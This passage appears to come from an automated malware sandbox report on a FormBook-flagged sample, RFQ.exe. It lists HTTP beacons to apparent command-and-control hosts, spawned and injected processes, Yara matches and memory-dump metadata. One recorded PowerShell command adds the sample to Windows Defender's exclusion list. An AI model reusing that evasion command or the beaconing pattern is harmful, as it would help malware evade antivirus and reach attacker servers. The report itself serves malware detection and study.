                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Apr 16, 2024 12:03:30.114063978 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 10:03:30 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port
57 | 192.168.2.5 | 49776 | 91.195.240.117 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 16, 2024 12:03:32.635921001 CEST | 456 | OUT | GET /bnz5/?gr=Z7N7hXY/vxItmyrXNQB4LENYEQnuSZ4/X1tSw0B7uFqoJtXe6IwXeXQiXEM/Xr4/ado0xvKOz5lKhVT9TZmVC0ntJKIXA1qlQqDuwiNLRNgNzKASDET1ivmJ23BpeRNTPw==&kFGTX=Q6OxIXo8tXD HTTP/1.1
                                                                                                      Host: www.blueberry-breeze.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Apr 16, 2024 12:03:32.848392010 CEST | 107 | IN | HTTP/1.1 436
                                                                                                      date: Tue, 16 Apr 2024 10:03:32 GMT
                                                                                                      content-length: 0
                                                                                                      server: NginX
                                                                                                      connection: close


                                                                                                      Target ID:0
                                                                                                      Start time:11:58:53
                                                                                                      Start date:16/04/2024
                                                                                                      Path:C:\Users\user\Desktop\RFQ.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\RFQ.exe"
                                                                                                      Imagebase:0x810000
                                                                                                      File size:820'224 bytes
                                                                                                      MD5 hash:4D82CC1B35B8DC9EC7D149F1B8B95E95
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:3
                                                                                                      Start time:11:58:54
                                                                                                      Start date:16/04/2024
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ.exe"
                                                                                                      Imagebase:0x520000
                                                                                                      File size:433'152 bytes
                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:4
                                                                                                      Start time:11:58:54
                                                                                                      Start date:16/04/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:5
                                                                                                      Start time:11:58:54
                                                                                                      Start date:16/04/2024
                                                                                                      Path:C:\Users\user\Desktop\RFQ.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\RFQ.exe"
                                                                                                      Imagebase:0xe80000
                                                                                                      File size:820'224 bytes
                                                                                                      MD5 hash:4D82CC1B35B8DC9EC7D149F1B8B95E95
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2157544338.0000000001920000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2157544338.0000000001920000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2158404724.0000000002750000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2158404724.0000000002750000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:6
                                                                                                      Start time:11:58:56
                                                                                                      Start date:16/04/2024
                                                                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                      Imagebase:0x7ff6ef0c0000
                                                                                                      File size:496'640 bytes
                                                                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:7
                                                                                                      Start time:11:59:03
                                                                                                      Start date:16/04/2024
                                                                                                      Path:C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe"
                                                                                                      Imagebase:0x8f0000
                                                                                                      File size:140'800 bytes
                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4431863732.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4431863732.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      Target ID:8
                                                                                                      Start time:11:59:04
                                                                                                      Start date:16/04/2024
                                                                                                      Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\SysWOW64\icacls.exe"
                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                      File size:29'696 bytes
                                                                                                      MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4432058562.0000000003690000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4432058562.0000000003690000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4432005342.0000000003650000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4432005342.0000000003650000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      Target ID:10
                                                                                                      Start time:11:59:17
                                                                                                      Start date:16/04/2024
                                                                                                      Path:C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe"
                                                                                                      Imagebase:0x8f0000
                                                                                                      File size:140'800 bytes
                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4433484681.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.4433484681.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      Target ID:11
                                                                                                      Start time:11:59:29
                                                                                                      Start date:16/04/2024
                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                      Imagebase:0x7ff79f9e0000
                                                                                                      File size:676'768 bytes
                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true


                                                                                                        Execution Graph

                                                                                                        Execution Coverage:10.8%
                                                                                                        Dynamic/Decrypted Code Coverage:98.1%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:156
                                                                                                        Total number of Limit Nodes:5

                                                                                                        Control-flow Graph

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2018253889.0000000008F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F20000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_8f20000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Haq$Haq$Haq$Haq$Haq$Haq$i
                                                                                                        • API String ID: 0-3630233658
                                                                                                        • Opcode ID: c95bd13aa8c7a479f91a2bb32d9fa9a010c1b0292774e77f2326b7abe039bd16
                                                                                                        • Instruction ID: 5a1362afae532b95eddc6bb3f6b968dae24fdec9e225a4b2c3df3daf4a856369
                                                                                                        • Opcode Fuzzy Hash: c95bd13aa8c7a479f91a2bb32d9fa9a010c1b0292774e77f2326b7abe039bd16
                                                                                                        • Instruction Fuzzy Hash: 6542BF71B002148FCB48AB7998A476E7BAAFFD4310B248969D50ADB3E5DE34DD03C791
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2016994262.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_72e0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a5c43e59213d12c267998124268d115590d8d1e04d717be8f76b2c7c902509e4
                                                                                                        • Instruction ID: fa7105616f6e7786b50fb988805e7fdf056c03585490ac1aa0d9479db318ce87
                                                                                                        • Opcode Fuzzy Hash: a5c43e59213d12c267998124268d115590d8d1e04d717be8f76b2c7c902509e4
                                                                                                        • Instruction Fuzzy Hash: 72A22871E102198FCB55DF68C8586EDB7B2FF89300F1482A9D90AA7351EB74AE91CF41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2018253889.0000000008F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F20000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_8f20000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 32d86a7f67c4c639da71f29846f8d8523f44a825b74e3cfdc86144c28b577ea4
                                                                                                        • Instruction ID: d83eb62a963eafccdf4c1eb5dde9edad0425665e47c45b4f705aa94cc2d82d4f
                                                                                                        • Opcode Fuzzy Hash: 32d86a7f67c4c639da71f29846f8d8523f44a825b74e3cfdc86144c28b577ea4
                                                                                                        • Instruction Fuzzy Hash: 3A521470A00624CFCB14DF68C588AADB7F2FF98315F2585A8E40A9B365DB75EC46CB44
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2009243448.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1220000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e3d5af192b0dd5ae63110222bc33d60bf978788dab0523f186d64a77e1042907
                                                                                                        • Instruction ID: 2b60f3cb4babfa39145f688bff956ba439595d0d6e3a82eabc9aeb0734f045f2
                                                                                                        • Opcode Fuzzy Hash: e3d5af192b0dd5ae63110222bc33d60bf978788dab0523f186d64a77e1042907
                                                                                                        • Instruction Fuzzy Hash: 3F316F30A097609FD329EB3488526FE77A3EFEA325F84886DC0561F264CE769442D741
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2009243448.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1220000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 664b149e2571b3c75bbe75ef97038d088e8d3ec6cf0848b6dbf7fe331d6eaed8
                                                                                                        • Instruction ID: 0c66eab7851bcc830a4af5c5a1dbdc40b0bc7fab349fae3781828f7984aa81ca
                                                                                                        • Opcode Fuzzy Hash: 664b149e2571b3c75bbe75ef97038d088e8d3ec6cf0848b6dbf7fe331d6eaed8
                                                                                                        • Instruction Fuzzy Hash: 7221D830A15721DBD32DEB3188525BE73A7EFEA315B94CC7CC05A1B264CE76A442EB41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: fbq$ fbq$ fbq$Te]q$Te]q$XX]q$XX]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                        • API String ID: 0-148817952
                                                                                                        • Opcode ID: d81b9c47fe622d8c65c14a0a8815f2c6ea7239950e4e29a6eaa9827e215465a5
                                                                                                        • Instruction ID: 96c7a786ad759e2d3a84de9621b33fc9c2684cbd3ced1eb2c32432a135bfbf42
                                                                                                        • Opcode Fuzzy Hash: d81b9c47fe622d8c65c14a0a8815f2c6ea7239950e4e29a6eaa9827e215465a5
                                                                                                        • Instruction Fuzzy Hash: F8A160B4A10299CFDB148EACC544AEEB7B6BF83701F658936D9416B3D4C7349C42CB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: fbq$ fbq$Te]q$XX]q$XX]q$XX]q$$]q$$]q$$]q$$]q
                                                                                                        • API String ID: 0-4039791027
                                                                                                        • Opcode ID: 1ba3e32d2e381a09a3e9b7f53c5949e4e94b0bd1fa6f81b59520c7d596ddb9f5
                                                                                                        • Instruction ID: a57fefc1c92c57a6432d34b3c0040413ed8e7933152992f7a02e258d5b8c1f06
                                                                                                        • Opcode Fuzzy Hash: 1ba3e32d2e381a09a3e9b7f53c5949e4e94b0bd1fa6f81b59520c7d596ddb9f5
                                                                                                        • Instruction Fuzzy Hash: 7CB1B1F4A14289CFDB149BACC548AEDBBB1AB83310F14497BD6019B2D4D7389892CB81
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0122DC56
                                                                                                        • GetCurrentThread.KERNEL32 ref: 0122DC93
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0122DCD0
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0122DD29
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2009243448.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1220000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Current$ProcessThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2063062207-0
                                                                                                        • Opcode ID: 5b31c92b4dd3fde800431e98682c04833beb8d1deb3a03fd44d1343a56749b84
                                                                                                        • Instruction ID: 5fddfbf0c6087914d08c005c6e53f584b5a9da269e144b9b221a66b7b1282763
                                                                                                        • Opcode Fuzzy Hash: 5b31c92b4dd3fde800431e98682c04833beb8d1deb3a03fd44d1343a56749b84
                                                                                                        • Instruction Fuzzy Hash: 895168B09003099FDB04DFAAD648BAEBBF5FF48304F208459E109A7261DB799945CF65
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017037657.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_72f0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Haq$Haq$$]q$$]q
                                                                                                        • API String ID: 0-248378458
                                                                                                        • Opcode ID: 08c03cc00667ef17e45f167ce869fcec5edaf6bf185db1e03cc8e479641d456c
                                                                                                        • Instruction ID: 52162a120f7eead8e512aad48955f650ac60466ed1c6e5cd47ade5a45175b53d
                                                                                                        • Opcode Fuzzy Hash: 08c03cc00667ef17e45f167ce869fcec5edaf6bf185db1e03cc8e479641d456c
                                                                                                        • Instruction Fuzzy Hash: 9AC18CB1A0021ACFCB18DF68C584A6EFBE2FF84310F14C56AD9199B395DB35D846CB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 077B85DE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: 4f95aa5d548f36d68fb4ea2c0e1ae3b859cbd2ce25c1fe7753d592f0dcb7f9ce
                                                                                                        • Instruction ID: 77b3c369c360d680bb024aa4cf1dbf7f9afdadc188c2ce63d01cb4126bf4e108
                                                                                                        • Opcode Fuzzy Hash: 4f95aa5d548f36d68fb4ea2c0e1ae3b859cbd2ce25c1fe7753d592f0dcb7f9ce
                                                                                                        • Instruction Fuzzy Hash: DD917CB1D0021ACFDB24CFA8C8407EDBBB6FF48354F1485A9E819A7250DB749985CF92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 077B85DE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: f91406fb244662f7dca89b3e37d5058bc936b652043d3071dc266a31338a00da
                                                                                                        • Instruction ID: e3dd887a63ab951fd8170a3a8fd1550e8d9f61fd2ddac1df9c19ce7f175aa718
                                                                                                        • Opcode Fuzzy Hash: f91406fb244662f7dca89b3e37d5058bc936b652043d3071dc266a31338a00da
                                                                                                        • Instruction Fuzzy Hash: EA918EB1D0021ACFEB24CFA8C8417EDBBB6FF48354F1485A9D819A7250DB749985CF92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0122BA7E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2009243448.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1220000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HandleModule
                                                                                                        • String ID:
                                                                                                        • API String ID: 4139908857-0
                                                                                                        • Opcode ID: 4aa6b119f8f5f8ec75e971634682ed5b54602eb611f4d6664b6dceada8f3bb33
                                                                                                        • Instruction ID: 0b1e61d657607b8052584d3ca7cb1a9095ca12a9ecd8ea071357059b1b0fc6b1
                                                                                                        • Opcode Fuzzy Hash: 4aa6b119f8f5f8ec75e971634682ed5b54602eb611f4d6664b6dceada8f3bb33
                                                                                                        • Instruction Fuzzy Hash: 2A814470A10B569FD724CF29D0557AABBF1FF88300F00892ED58AD7A50DB74E94ACB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 051827C2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2015048702.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5180000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 716092398-0
                                                                                                        • Opcode ID: 289b07633d50583817da008dbfe0501e77ff3b8fbb6d45ba922b68d00330138a
                                                                                                        • Instruction ID: 92590219569a98b3e1ced7a5c1b4d1aa73da11dc79a9d40aa5e2977a3d48d932
                                                                                                        • Opcode Fuzzy Hash: 289b07633d50583817da008dbfe0501e77ff3b8fbb6d45ba922b68d00330138a
                                                                                                        • Instruction Fuzzy Hash: 3B51D0B5D003099FDB25DF9AC984ADEFBF5BF48300F24852AE419AB210D7749845CF90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 051827C2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2015048702.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5180000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 716092398-0
                                                                                                        • Opcode ID: ccdcd52105172646a5c172bcd8899b92eaeff758bf673b9d67a09adaf8760aa9
                                                                                                        • Instruction ID: 9ae7a8a6562808397aa50112c7696bc42a7ed53c3869e986946074072cbe57c5
                                                                                                        • Opcode Fuzzy Hash: ccdcd52105172646a5c172bcd8899b92eaeff758bf673b9d67a09adaf8760aa9
                                                                                                        • Instruction Fuzzy Hash: B941A0B5D003099FDB25DF9AC884ADEFBF5BF48310F24812AE819AB250D7759845CF90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 05184D41
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2015048702.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5180000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CallProcWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 2714655100-0
                                                                                                        • Opcode ID: b7366d8f7000f8a6cedd9c9113de22ed1f934e769fec7e2abdf99249121ed206
                                                                                                        • Instruction ID: 551f171aa8977d1f87ea8394af7e0158a6a99e6aeeca9f76ec58c0fa3856dfdb
                                                                                                        • Opcode Fuzzy Hash: b7366d8f7000f8a6cedd9c9113de22ed1f934e769fec7e2abdf99249121ed206
                                                                                                        • Instruction Fuzzy Hash: B44129B89003058FCB24DF99C448AAAFBF9FF88314F25C959D519A7321D774A845CFA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 01225F11
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2009243448.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1220000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Create
                                                                                                        • String ID:
                                                                                                        • API String ID: 2289755597-0
                                                                                                        • Opcode ID: a85332dee98bfeed8f4b42d68d8eeaf7619cddfd392bd7df7ecd7d226d5042ab
                                                                                                        • Instruction ID: c54ad29971bc6329563292c4b367fe9789fdea1dd95281923a39068a7fd20f7a
                                                                                                        • Opcode Fuzzy Hash: a85332dee98bfeed8f4b42d68d8eeaf7619cddfd392bd7df7ecd7d226d5042ab
                                                                                                        • Instruction Fuzzy Hash: 7841E0B0C10629DFDB24DFA9C844BDEBBF5BF49304F20806AD418AB255DBB56946CF90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 01225F11
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2009243448.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1220000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Create
                                                                                                        • String ID:
                                                                                                        • API String ID: 2289755597-0
                                                                                                        • Opcode ID: e827c3f98e37ed2eb0f7f43da3df64d8750df4269f425ac9b1242845adf8ac5b
                                                                                                        • Instruction ID: 6b76322957052fe53ec85b48aa6cc41bcb23526be6a91f4e50f4441cb4c9ca7b
